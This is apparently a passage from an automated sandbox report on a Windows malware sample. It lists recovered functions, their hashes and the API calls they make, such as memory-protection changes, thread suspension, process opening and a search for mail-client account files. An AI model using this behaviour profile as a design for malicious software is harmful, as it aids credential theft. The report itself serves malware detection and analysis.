  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33F3A, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 114
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31395, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB4E6, Relevance: 6.1, APIs: 4, Instructions: 57 Total matches: 46sleep
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B329FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
